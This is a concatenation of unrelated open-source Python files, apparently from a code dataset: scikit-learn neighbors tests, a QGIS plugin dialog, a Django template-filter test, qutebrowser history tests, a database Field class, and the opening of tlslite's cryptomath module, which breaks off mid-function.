X = digits.data.astype('uint8') Y = digits.target (n_samples, n_features) = X.shape train_test_boundary = int(n_samples * 0.8) train = np.arange(0, train_test_boundary) test = np.arange(train_test_boundary, n_samples) (X_train, Y_train, X_test, Y_test) = X[train], Y[train], X[test], Y[test] clf = neighbors.KNeighborsClassifier(n_neighbors=1, algorithm='brute') score_uint8 = clf.fit(X_train, Y_train).score(X_test, Y_test) score_float = clf.fit(X_train.astype(float), Y_train).score( X_test.astype(float), Y_test) assert_equal(score_uint8, score_float) def test_kneighbors_graph(): # Test kneighbors_graph to build the k-Nearest Neighbor graph. X = np.array([[0, 1], [1.01, 1.], [2, 0]]) # n_neighbors = 1 A = neighbors.kneighbors_graph(X, 1, mode='connectivity', include_self=True) assert_array_equal(A.toarray(), np.eye(A.shape[0])) A = neighbors.kneighbors_graph(X, 1, mode='distance') assert_array_almost_equal( A.toarray(), [[0.00, 1.01, 0.], [1.01, 0., 0.], [0.00, 1.40716026, 0.]]) # n_neighbors = 2 A = neighbors.kneighbors_graph(X, 2, mode='connectivity', include_self=True) assert_array_equal( A.toarray(), [[1., 1., 0.], [1., 1., 0.], [0., 1., 1.]]) A = neighbors.kneighbors_graph(X, 2, mode='distance') assert_array_almost_equal( A.toarray(), [[0., 1.01, 2.23606798], [1.01, 0., 1.40716026], [2.23606798, 1.40716026, 0.]]) # n_neighbors = 3 A = neighbors.kneighbors_graph(X, 3, mode='connectivity', include_self=True) assert_array_almost_equal( A.toarray(), [[1, 1, 1], [1, 1, 1], [1, 1, 1]]) def test_kneighbors_graph_sparse(seed=36): # Test kneighbors_graph to build the k-Nearest Neighbor graph # for sparse input. 
rng = np.random.RandomState(seed) X = rng.randn(10, 10) Xcsr = csr_matrix(X) for n_neighbors in [1, 2, 3]: for mode in ["connectivity", "distance"]: assert_array_almost_equal( neighbors.kneighbors_graph(X, n_neighbors, mode=mode).toarray(), neighbors.kneighbors_graph(Xcsr, n_neighbors, mode=mode).toarray()) def test_radius_neighbors_graph(): # Test radius_neighbors_graph to build the Nearest Neighbor graph. X = np.array([[0, 1], [1.01, 1.], [2, 0]]) A = neighbors.radius_neighbors_graph(X, 1.5, mode='connectivity', include_self=True) assert_array_equal( A.toarray(), [[1., 1., 0.], [1., 1., 1.], [0., 1., 1.]]) A = neighbors.radius_neighbors_graph(X, 1.5, mode='distance') assert_array_almost_equal( A.toarray(), [[0., 1.01, 0.], [1.01, 0., 1.40716026], [0., 1.40716026, 0.]]) def test_radius_neighbors_graph_sparse(seed=36): # Test radius_neighbors_graph to build the Nearest Neighbor graph # for sparse input. rng = np.random.RandomState(seed) X = rng.randn(10, 10) Xcsr = csr_matrix(X) for n_neighbors in [1, 2, 3]: for mode in ["connectivity", "distance"]: assert_array_almost_equal( neighbors.radius_neighbors_graph(X, n_neighbors, mode=mode).toarray(), neighbors.radius_neighbors_graph(Xcsr, n_neighbors, mode=mode).toarray()) def test_neighbors_badargs(): # Test bad argument values: these should all raise ValueErrors assert_raises(ValueError, neighbors.NearestNeighbors, algorithm='blah') X = rng.random_sample((10, 2)) Xsparse = csr_matrix(X) y = np.ones(10) for cls in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): assert_raises(ValueError, cls, weights='blah') assert_raises(ValueError, cls, p=-1) assert_raises(ValueError, cls, algorithm='blah') nbrs = cls(algorithm='ball_tree', metric='haversine') assert_raises(ValueError, nbrs.predict, X) assert_raises(ValueError, ignore_warnings(nbrs.fit), Xsparse, y) nbrs = cls() assert_raises(ValueError, nbrs.fit, np.ones((0, 2)), np.ones(0)) 
assert_raises(ValueError, nbrs.fit, X[:, :, None], y) nbrs.fit(X, y) assert_raises(ValueError, nbrs.predict, [[]]) if (isinstance(cls, neighbors.KNeighborsClassifier) or isinstance(cls, neighbors.KNeighborsRegressor)): nbrs = cls(n_neighbors=-1) assert_raises(ValueError, nbrs.fit, X, y) nbrs = neighbors.NearestNeighbors().fit(X) assert_raises(ValueError, nbrs.kneighbors_graph, X, mode='blah') assert_raises(ValueError, nbrs.radius_neighbors_graph, X, mode='blah') def test_neighbors_metrics(n_samples=20, n_features=3, n_query_pts=2, n_neighbors=5): # Test computing the neighbors for various metrics # create a symmetric matrix V = rng.rand(n_features, n_features) VI = np.dot(V, V.T) metrics = [('euclidean', {}), ('manhattan', {}), ('minkowski', dict(p=1)), ('minkowski', dict(p=2)), ('minkowski', dict(p=3)), ('minkowski', dict(p=np.inf)), ('chebyshev', {}), ('seuclidean', dict(V=rng.rand(n_features))), ('wminkowski', dict(p=3, w=rng.rand(n_features))), ('mahalanobis', dict(VI=VI))] algorithms = ['brute', 'ball_tree', 'kd_tree'] X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for metric, metric_params in metrics: results = [] p = metric_params.pop('p', 2) for algorithm in algorithms: # KD tree doesn't support all metrics if (algorithm == 'kd_tree' and metric not in neighbors.KDTree.valid_metrics): assert_raises(ValueError, neighbors.NearestNeighbors, algorithm=algorithm, metric=metric, metric_params=metric_params) continue neigh = neighbors.NearestNeighbors(n_neighbors=n_neighbors, algorithm=algorithm, metric=metric, p=p, metric_params=metric_params) neigh.fit(X) results.append(neigh.kneighbors(test, return_distance=True)) assert_array_almost_equal(results[0][0], results[1][0]) assert_array_almost_equal(results[0][1], results[1][1]) def test_callable_metric(): metric = lambda x1, x2: np.sqrt(np.sum(x1 ** 2 + x2 ** 2)) X = np.random.RandomState(42).rand(20, 2) nbrs1 = neighbors.NearestNeighbors(3, algorithm='auto', metric=metric) nbrs2 = 
neighbors.NearestNeighbors(3, algorithm='brute', metric=metric) nbrs1.fit(X) nbrs2.fit(X) dist1, ind1 = nbrs1.kneighbors(X) dist2, ind2 = nbrs2.kneighbors(X) assert_array_almost_equal(dist1, dist2) def test_metric_params_interface(): assert_warns(SyntaxWarning, neighbors.KNeighborsClassifier, metric_params={'p': 3}) def test_predict_sparse_ball_kd_tree(): rng = np.random.RandomState(0) X = rng.rand(5, 5) y = rng.randint(0, 2, 5) nbrs1 = neighbors.KNeighborsClassifier(1, algorithm='kd_tree') nbrs2 = neighbors.KNeighborsRegressor(1, algorithm='ball_tree') for model in [nbrs1, nbrs2]: model.fit(X, y) assert_raises(ValueError, model.predict, csr_matrix(X)) def test_non_euclidean_kneighbors(): rng = np.random.RandomState(0) X = rng.rand(5, 5) # Find a reasonable radius. dist_array = pairwise_distances(X).flatten() np.sort(dist_array) radius = dist_array[15] # Test kneighbors_graph for metric in ['manhattan', 'chebyshev']: nbrs_graph = neighbors.kneighbors_graph( X, 3, metric=metric, mode='connectivity', include_self=True).toarray() nbrs1 = neighbors.NearestNeighbors(3, metric=metric).fit(X) assert_array_equal(nbrs_graph, nbrs1.kneighbors_graph(X).toarray()) # Test radiusneighbors_graph for metric in ['manhattan', 'chebyshev']: nbrs_graph = neighbors.radius_neighbors_graph( X, radius, metric=metric, mode='connectivity', include_self=True).toarray() nbrs1 = neighbors.NearestNeighbors(metric=metric, radius=radius).fit(X) assert_array_equal(nbrs_graph, nbrs1.radius_neighbors_graph(X).A) # Raise error when wrong parameters are supplied, X_nbrs = neighbors.NearestNeighbors(3, metric='manhattan') X_nbrs.fit(X) assert_raises(ValueError, neighbors.kneighbors_graph, X_nbrs, 3, metric='euclidean') X_nbrs = neighbors.NearestNeighbors(radius=radius, metric='manhattan') X_nbrs.fit(X) assert_raises(ValueError, neighbors.radius_neighbors_graph, X_nbrs, radius, metric='euclidean') def check_object_arrays(nparray, list_check): for ind, ele in enumerate(nparray): assert_array_equal(ele, 
list_check[ind]) def test_k_and_radius_neighbors_train_is_not_query(): # Test kneighbors et.al when query is not training data for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) X = [[0], [1]] nn.fit(X) test_data = [[2], [1]] # Test neighbors. dist, ind = nn.kneighbors(test_data) assert_array_equal(dist, [[1], [0]]) assert_array_equal(ind, [[1], [1]]) dist, ind = nn.radius_neighbors([[2], [1]], radius=1.5) check_object_arrays(dist, [[1], [1, 0]]) check_object_arrays(ind, [[1], [0, 1]]) # Test the graph variants. assert_array_equal( nn.kneighbors_graph(test_data).A, [[0., 1.], [0., 1.]]) assert_array_equal( nn.kneighbors_graph([[2], [1]], mode='distance').A, np.array([[0., 1.], [0., 0.]])) rng = nn.radius_neighbors_graph([[2], [1]], radius=1.5) assert_array_equal(rng.A, [[0, 1], [1, 1]]) def test_k_and_radius_neighbors_X_None(): # Test kneighbors et.al when query is None for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) X = [[0], [1]] nn.fit(X) dist, ind = nn.kneighbors() assert_array_equal(dist, [[1], [1]]) assert_array_equal(ind, [[1], [0]]) dist, ind = nn.radius_neighbors(None, radius=1.5) check_object_arrays(dist, [[1], [1]]) check_object_arrays(ind, [[1], [0]]) # Test the graph variants. 
rng = nn.radius_neighbors_graph(None, radius=1.5) kng = nn.kneighbors_graph(None) for graph in [rng, kng]: assert_array_equal(rng.A, [[0, 1], [1, 0]]) assert_array_equal(rng.data, [1, 1]) assert_array_equal(rng.indices, [1, 0]) X = [[0, 1], [0, 1], [1, 1]] nn = neighbors.NearestNeighbors(n_neighbors=2, algorithm=algorithm) nn.fit(X) assert_array_equal( nn.kneighbors_graph().A, np.array([[0., 1., 1.], [1., 0., 1.], [1., 1., 0]])) def test_k_and_radius_neighbors_duplicates(): # Test behavior of kneighbors when duplicates are present in query for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) nn.fit([[0], [1]]) # Do not do anything special to duplicates. kng = nn.kneighbors_graph([[0], [1]], mode='distance') assert_array_equal( kng.A, np.array([[0., 0.], [0., 0.]])) assert_array_equal(kng.data, [0., 0.]) assert_array_equal(kng.indices, [0, 1]) dist, ind = nn.radius_neighbors([[0], [1]], radius=1.5) check_object_arrays(dist, [[0, 1], [1, 0]]) check_object_arrays(ind, [[0, 1], [0, 1]]) rng = nn.radius_neighbors_graph([[0], [1]], radius=1.5) assert_array_equal(rng.A, np.ones((2, 2))) rng = nn.radius_neighbors_graph([[0], [1]], radius=1.5, mode='distance') assert_array_equal(rng.A, [[0, 1], [1, 0]]) assert_array_equal(rng.indices, [0, 1, 0, 1]) assert_array_equal(rng.data, [0, 1, 1, 0]) # Mask the first duplicates when n_duplicates > n_neighbors. X = np.ones((3, 1)) nn = neighbors.NearestNeighbors(n_neighbors=1) nn.fit(X) dist, ind = nn.kneighbors() assert_array_equal(dist, np.zeros((3, 1))) assert_array_equal(ind, [[1], [0], [1]]) # Test that zeros are explicitly marked in kneighbors_graph. 
kng = nn.kneighbors_graph(mode='distance') assert_array_equal( kng.A, np.zeros((3, 3))) assert_array_equal(kng.data, np.zeros(3)) assert_array_equal(kng.indices, [1., 0., 1.]) assert_array_equal( nn.kneighbors_graph().A, np.array([[0., 1., 0.], [1., 0., 0.], [0., 1., 0.]])) def test_include_self_neighbors_graph(): # Test include_self parameter in neighbors_graph X = [[2, 3], [4, 5]] kng = neighbors.kneighbors_graph(X, 1, include_self=True).A kng_not_self = neighbors.kneighbors_graph(X, 1, include_self=False).A assert_array_equal(kng, [[1., 0.], [0., 1.]]) assert_array_equal(kng_not_self, [[0., 1.], [1., 0.]]) rng = neighbors.radius_neighbors_graph(X, 5.0, include_self=True).A rng_not_self = neighbors.radius_neighbors_graph( X, 5.0, include_self=False).A assert_array_equal(rng, [[1., 1.], [1., 1.]]) assert_array_equal(rng_not_self, [[0., 1.], [1., 0.]]) def test_kneighbors_parallel(): X, y = datasets.make_classification(n_samples=10, n_features=2, n_redundant=0, random_state=0) X_train, X_test, y_train, y_test = train_test_split(X, y) for algorithm in ALGORITHMS: clf = neighbors.KNeighborsClassifier(n_neighbors=3, algorithm=algorithm) clf.fit(X_train, y_train) y_1 = clf.predict(X_test) dist_1, ind_1 = clf.kneighbors(X_test) A_1 = clf.kneighbors_graph(X_test, mode='distance').toarray() for n_jobs in [-1, 2, 5]: clf.set_params(n_jobs=n_jobs) y = clf.predict(X_test) dist, ind = clf.kneighbors(X_test) A = clf.kneighbors_graph(X_test, mode='distance').toarray() assert_array_equal(y_1, y) assert_array_almost_equal(dist_1, dist) assert_array_equal(ind_1, ind) assert_array_almost_equal(A_1, A) def test_dtype_convert(): classifier = neighbors.KNeighborsClassifier(n_neighbors=1) CLASSES = 15 X = np.eye(CLASSES) y = [ch for ch in 'ABCDEFGHIJKLMNOPQRSTU'[:CLASSES]] result = classifier.fit(X, y).predict(X) assert_array_equal(result, y)
alfanugraha/LUMENS-repo
refs/heads/master
processing/DockableMirrorMap/DlgAbout.py
2
# -*- coding: utf-8 -*- from PyQt4.QtCore import * from PyQt4.QtGui import * from ui.DlgAbout_ui import Ui_DlgAbout from DockableMirrorMap import name, description, version import platform try: import resources except ImportError: import resources_rc class DlgAbout(QDialog, Ui_DlgAbout): def __init__(self, parent=None): QDialog.__init__(self, parent) self.setupUi(self) self.logo.setPixmap( QPixmap( ":/faunalia/logo" ) ) self.title.setText( name() ) self.description.setText( description() ) text = self.txt.toHtml() text = text.replace( "$PLUGIN_NAME$", name() ) subject = "Help: %s" % name() body = """\n\n -------- Plugin name: %s Plugin version: %s Python version: %s Platform: %s - %s -------- """ % ( name(), version(), platform.python_version(), platform.system(), platform.version() ) mail = QUrl( "mailto:abc@abc.com" ) mail.addQueryItem( "subject", subject ) mail.addQueryItem( "body", body ) text = text.replace( "$MAIL_SUBJECT$", unicode(mail.encodedQueryItemValue( "subject" )) ) text = text.replace( "$MAIL_BODY$", unicode(mail.encodedQueryItemValue( "body" )) ) self.txt.setHtml(text)
unaizalakain/django
refs/heads/master
tests/template_tests/filter_tests/test_safe.py
521
from django.test import SimpleTestCase from ..utils import setup class SafeTests(SimpleTestCase): @setup({'safe01': '{{ a }} -- {{ a|safe }}'}) def test_safe01(self): output = self.engine.render_to_string('safe01', {'a': '<b>hello</b>'}) self.assertEqual(output, '&lt;b&gt;hello&lt;/b&gt; -- <b>hello</b>') @setup({'safe02': '{% autoescape off %}{{ a }} -- {{ a|safe }}{% endautoescape %}'}) def test_safe02(self): output = self.engine.render_to_string('safe02', {'a': '<b>hello</b>'}) self.assertEqual(output, '<b>hello</b> -- <b>hello</b>')
neeasade/qutebrowser
refs/heads/master
tests/unit/browser/webkit/test_history.py
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2016 Florian Bruhin (The Compiler) <mail@qutebrowser.org> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """Tests for the global page history.""" import base64 import logging import pytest import hypothesis from hypothesis import strategies from PyQt5.QtCore import QUrl from PyQt5.QtWebKit import QWebHistoryInterface from qutebrowser.browser.webkit import history from qutebrowser.utils import objreg class FakeWebHistory: """A fake WebHistory object.""" def __init__(self, history_dict): self.history_dict = history_dict @pytest.fixture(autouse=True) def prerequisites(config_stub, fake_save_manager): """Make sure everything is ready to initialize a WebHistory.""" config_stub.data = {'general': {'private-browsing': False}} @pytest.fixture() def hist(tmpdir): return history.WebHistory(hist_dir=str(tmpdir), hist_name='history') def test_async_read_twice(monkeypatch, qtbot, tmpdir, caplog): (tmpdir / 'filled-history').write('\n'.join([ '12345 http://example.com/ title', '67890 http://example.com/', '12345 http://qutebrowser.org/ blah', ])) hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') next(hist.async_read()) with pytest.raises(StopIteration): next(hist.async_read()) expected = "Ignoring async_read() because reading is started." 
assert len(caplog.records) == 1 assert caplog.records[0].msg == expected def test_async_read_no_datadir(qtbot, config_stub, fake_save_manager): config_stub.data = {'general': {'private-browsing': False}} hist = history.WebHistory(hist_dir=None, hist_name='history') with qtbot.waitSignal(hist.async_read_done): list(hist.async_read()) @pytest.mark.parametrize('redirect', [True, False]) def test_adding_item_during_async_read(qtbot, hist, redirect): """Check what happens when adding URL while reading the history.""" url = QUrl('http://www.example.com/') with qtbot.assertNotEmitted(hist.add_completion_item), \ qtbot.assertNotEmitted(hist.item_added): hist.add_url(url, redirect=redirect, atime=12345) if redirect: with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.async_read_done): list(hist.async_read()) else: with qtbot.waitSignals([hist.add_completion_item, hist.async_read_done]): list(hist.async_read()) assert not hist._temp_history expected = history.Entry(url=url, atime=12345, redirect=redirect, title="") assert list(hist.history_dict.values()) == [expected] def test_private_browsing(qtbot, tmpdir, fake_save_manager, config_stub): """Make sure no data is saved at all with private browsing.""" config_stub.data = {'general': {'private-browsing': True}} private_hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='history') # Before initial read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): private_hist.add_url(QUrl('http://www.example.com/')) assert not private_hist._temp_history # read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): with qtbot.waitSignals([private_hist.async_read_done]): list(private_hist.async_read()) # after read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): private_hist.add_url(QUrl('http://www.example.com/')) 
assert not private_hist._temp_history assert not private_hist._new_history assert not private_hist.history_dict def test_iter(hist): list(hist.async_read()) url = QUrl('http://www.example.com/') hist.add_url(url, atime=12345) entry = history.Entry(url=url, atime=12345, redirect=False, title="") assert list(hist) == [entry] def test_len(hist): assert len(hist) == 0 list(hist.async_read()) url = QUrl('http://www.example.com/') hist.add_url(url) assert len(hist) == 1 @pytest.mark.parametrize('line', [ '12345 http://example.com/ title', # with title '67890 http://example.com/', # no title '12345 http://qutebrowser.org/ ', # trailing space ' ', '', ]) def test_read(hist, tmpdir, line): (tmpdir / 'filled-history').write(line + '\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) def test_updated_entries(hist, tmpdir): (tmpdir / 'filled-history').write('12345 http://example.com/\n' '67890 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) assert hist.history_dict['http://example.com/'].atime == 67890 hist.add_url(QUrl('http://example.com/'), atime=99999) assert hist.history_dict['http://example.com/'].atime == 99999 def test_invalid_read(hist, tmpdir, caplog): (tmpdir / 'filled-history').write('foobar\n12345 http://example.com/') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') with caplog.at_level(logging.WARNING): list(hist.async_read()) entries = list(hist.history_dict.values()) assert len(entries) == 1 assert len(caplog.records) == 1 msg = "Invalid history entry 'foobar': 2 or 3 fields expected!" 
assert caplog.records[0].msg == msg def test_get_recent(hist, tmpdir): (tmpdir / 'filled-history').write('12345 http://example.com/') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/'), atime=67890) lines = hist.get_recent() expected = ['12345 http://example.com/', '67890 http://www.qutebrowser.org/'] assert lines == expected def test_save(hist, tmpdir): hist_file = tmpdir / 'filled-history' hist_file.write('12345 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/'), atime=67890) hist.save() lines = hist_file.read().splitlines() expected = ['12345 http://example.com/', '67890 http://www.qutebrowser.org/'] assert lines == expected hist.add_url(QUrl('http://www.the-compiler.org/'), atime=99999) hist.save() expected.append('99999 http://www.the-compiler.org/') lines = hist_file.read().splitlines() assert lines == expected def test_clear(qtbot, hist, tmpdir): hist_file = tmpdir / 'filled-history' hist_file.write('12345 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/')) with qtbot.waitSignal(hist.cleared): hist.clear() assert not hist_file.read() assert not hist.history_dict assert not hist._new_history hist.add_url(QUrl('http://www.the-compiler.org/'), atime=67890) hist.save() lines = hist_file.read().splitlines() assert lines == ['67890 http://www.the-compiler.org/'] def test_add_item(qtbot, hist): list(hist.async_read()) url = 'http://www.example.com/' with qtbot.waitSignals([hist.add_completion_item, hist.item_added]): hist.add_url(QUrl(url), atime=12345, title="the title") entry = history.Entry(url=QUrl(url), redirect=False, atime=12345, title="the title") assert hist.history_dict[url] == entry def test_add_item_redirect(qtbot, 
hist): list(hist.async_read()) url = 'http://www.example.com/' with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.item_added): hist.add_url(QUrl(url), redirect=True, atime=12345) entry = history.Entry(url=QUrl(url), redirect=True, atime=12345, title="") assert hist.history_dict[url] == entry def test_add_item_redirect_update(qtbot, tmpdir): """A redirect update added should override a non-redirect one.""" url = 'http://www.example.com/' hist_file = tmpdir / 'filled-history' hist_file.write('12345 {}\n'.format(url)) hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.item_added): hist.add_url(QUrl(url), redirect=True, atime=67890) entry = history.Entry(url=QUrl(url), redirect=True, atime=67890, title="") assert hist.history_dict[url] == entry @pytest.mark.parametrize('line, expected', [ ( # old format without title '12345 http://example.com/', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='',) ), ( # trailing space without title '12345 http://example.com/ ', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='',) ), ( # new format with title '12345 http://example.com/ this is a title', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='this is a title') ), ( # weird NUL bytes '\x0012345 http://example.com/', history.Entry(atime=12345, url=QUrl('http://example.com/'), title=''), ), ( # redirect flag '12345-r http://example.com/ this is a title', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='this is a title', redirect=True) ), ]) def test_entry_parse_valid(line, expected): entry = history.Entry.from_str(line) assert entry == expected @pytest.mark.parametrize('line', [ '12345', # one field '12345 ::', # invalid URL 'xyz http://www.example.com/', # invalid timestamp '12345-x http://www.example.com/', # invalid flags '12345-r-r 
http://www.example.com/', # double flags ]) def test_entry_parse_invalid(line): with pytest.raises(ValueError): history.Entry.from_str(line) @hypothesis.given(strategies.text()) def test_entry_parse_hypothesis(text): """Make sure parsing works or gives us ValueError.""" try: history.Entry.from_str(text) except ValueError: pass @pytest.mark.parametrize('entry, expected', [ # simple ( history.Entry(12345, QUrl('http://example.com/'), "the title"), "12345 http://example.com/ the title", ), # timestamp as float ( history.Entry(12345.678, QUrl('http://example.com/'), "the title"), "12345 http://example.com/ the title", ), # no title ( history.Entry(12345.678, QUrl('http://example.com/'), ""), "12345 http://example.com/", ), # redirect flag ( history.Entry(12345.678, QUrl('http://example.com/'), "", redirect=True), "12345-r http://example.com/", ), ]) def test_entry_str(entry, expected): assert str(entry) == expected @pytest.yield_fixture def hist_interface(): entry = history.Entry(atime=0, url=QUrl('http://www.example.com/'), title='example') history_dict = {'http://www.example.com/': entry} fake_hist = FakeWebHistory(history_dict) interface = history.WebHistoryInterface(fake_hist) QWebHistoryInterface.setDefaultInterface(interface) yield QWebHistoryInterface.setDefaultInterface(None) def test_history_interface(qtbot, webview, hist_interface): html = "<a href='about:blank'>foo</a>" data = base64.b64encode(html.encode('utf-8')).decode('ascii') url = QUrl("data:text/html;charset=utf-8;base64,{}".format(data)) with qtbot.waitSignal(webview.loadFinished): webview.load(url) def test_init(qapp, tmpdir, monkeypatch, fake_save_manager): monkeypatch.setattr(history.standarddir, 'data', lambda: str(tmpdir)) history.init(qapp) hist = objreg.get('web-history') assert hist.parent() is qapp assert QWebHistoryInterface.defaultInterface()._history is hist assert fake_save_manager.add_saveable.called objreg.delete('web-history')
chadspratt/AveryDB
refs/heads/master
field.py
1
"""Field stores all information about a given field. The field object is used to represent fields from any data format and assists with converting fields between the inputs and the output.""" ## # Copyright 2013 Chad Spratt # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## class Field(object): """Stores a field definition.""" def __init__(self, fieldname, fieldattributes=None, fieldvalue='', source=None, dataformat=None, namelen=10): if fieldattributes is None: fieldattributes = {} # used for resetting a field self.originalname = fieldname if dataformat is not None: # preserves field attributes if output format is changed, changed back self.attributesbyformat = {dataformat: fieldattributes.copy()} else: self.attributesbyformat = {} self.originalvalue = fieldvalue # name and value that will be used in the output self.name = fieldname[:namelen] self.source = source self.value = fieldvalue # dictionary of attribute names and values, stored by file format self.attributes = fieldattributes self.namelenlimit = namelen self.namegen = self.namegenerator(namelen) # tablename_fieldname used for storage in sqlite # assigned by table during conversion of the data to sqlite self.sqlname = None def namegenerator(self, lenlimit): """Yields alternate field names for when there's a naming conflict.""" # append a number to create a different name dupecount = 1 if lenlimit is None: while True: yield self.originalname + str(dupecount) dupecount += 1 # append a number and trim the name as needed to 
meet the limit else: namelen = len(self.originalname) # store original length countlen = 1 namelen = lenlimit - countlen while True: # append next number to original alias yield self.originalname[:namelen] + str(dupecount) dupecount += 1 countlen = len(str(dupecount)) namelen = lenlimit - countlen def getnewname(self): """Supplies a new unique name candidate.""" return self.namegen.next() def resetname(self): """Resets the field name, though it will be changed if it conflicts.""" # trim name in case length limit has changed self.name = self.name[:self.namelenlimit] # reset the name generator self.namegen = self.namegenerator(self.namelenlimit) # Not currently used def resetvalue(self): """Resets the value of a field to it's original value.""" self.value = self.originalvalue def copy(self): """Creates a deep copy of the field.""" fieldcopy = Field(self.name, self.attributes, self.value) for dataformat in self.attributesbyformat: fieldcopy.attributesbyformat[dataformat] = ( self.attributesbyformat[dataformat].copy()) fieldcopy.originalname = self.originalname fieldcopy.originalvalue = self.originalvalue fieldcopy.source = self.source return fieldcopy def hasattribute(self, attributename): """Check if the field has an attribute by the given name.""" return attributename in self.attributes def getattribute(self, attributename): """Get an attribute value by name (case-insensitive).""" for key in self.attributes: if attributename.lower() == key.lower(): return self.attributes[key] # If the field doesn't have the attribute, return None. 
# possible ambiguity if an attribute had the value of None return None def getattributes(self): """Returns all attributes (eg: name, type) of a field as a list.""" attrlist = [self.name] attrlist.extend(self.attributes.values()) attrlist.append(self.value) return attrlist def setformat(self, dataformat, newattributes=None): """Set new attributes for the field when the format is changed.""" # Check if the attributes have already been defined for dataformat if dataformat in self.attributesbyformat: self.attributes = self.attributesbyformat[dataformat] else: # If the format isn't already defined, attributes are required if newattributes is None: raise ValueError('Field.setformat: ' + dataformat + ' not ' + 'defined, need attribute dictionary') self.attributes = newattributes self.attributesbyformat[dataformat] = newattributes def hasformat(self, dataformat): """Check if a format is defined for this field.""" return dataformat in self.attributesbyformat def __getitem__(self, key): if key == 'name' or key == 0: return self.name elif key == 'value' or key == len(self.attributes) + 1: return self.value elif key in self.attributes: return self.attributes[key] return self.attributes.values()[key - 1] def __setitem__(self, key, value): if key == 'name' or key == 0: self.name = value elif key == 'value' or key == len(self.attributes) + 1: self.value = value # set attribute by index elif type(key) == int or key.isdigit(): attrname = self.attributes.keys()[key - 1] self.attributes[attrname] = value # set attribute by name else: self.attributes[key] = value def __str__(self): return ('name: ' + self.name + '\nattr: ' + str(self.attributes) + '\nvalue: ' + self.value)
VanirAOSP/external_chromium_org
refs/heads/kk44
third_party/tlslite/tlslite/utils/cryptomath.py
77
"""cryptomath module This module has basic math/crypto code.""" import os import math import base64 import binascii # The sha module is deprecated in Python 2.6 try: import sha except ImportError: from hashlib import sha1 as sha # The md5 module is deprecated in Python 2.6 try: import md5 except ImportError: from hashlib import md5 from compat import * # ************************************************************************** # Load Optional Modules # ************************************************************************** # Try to load M2Crypto/OpenSSL try: from M2Crypto import m2 m2cryptoLoaded = True except ImportError: m2cryptoLoaded = False # Try to load cryptlib try: import cryptlib_py try: cryptlib_py.cryptInit() except cryptlib_py.CryptException, e: #If tlslite and cryptoIDlib are both present, #they might each try to re-initialize this, #so we're tolerant of that. if e[0] != cryptlib_py.CRYPT_ERROR_INITED: raise cryptlibpyLoaded = True except ImportError: cryptlibpyLoaded = False #Try to load GMPY try: import gmpy gmpyLoaded = True except ImportError: gmpyLoaded = False #Try to load pycrypto try: import Crypto.Cipher.AES pycryptoLoaded = True except ImportError: pycryptoLoaded = False # ************************************************************************** # PRNG Functions # ************************************************************************** # Get os.urandom PRNG try: os.urandom(1) def getRandomBytes(howMany): return stringToBytes(os.urandom(howMany)) prngName = "os.urandom" except: # Else get cryptlib PRNG if cryptlibpyLoaded: def getRandomBytes(howMany): randomKey = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED, cryptlib_py.CRYPT_ALGO_AES) cryptlib_py.cryptSetAttribute(randomKey, cryptlib_py.CRYPT_CTXINFO_MODE, cryptlib_py.CRYPT_MODE_OFB) cryptlib_py.cryptGenerateKey(randomKey) bytes = createByteArrayZeros(howMany) cryptlib_py.cryptEncrypt(randomKey, bytes) return bytes prngName = "cryptlib" else: #Else get UNIX /dev/urandom PRNG 
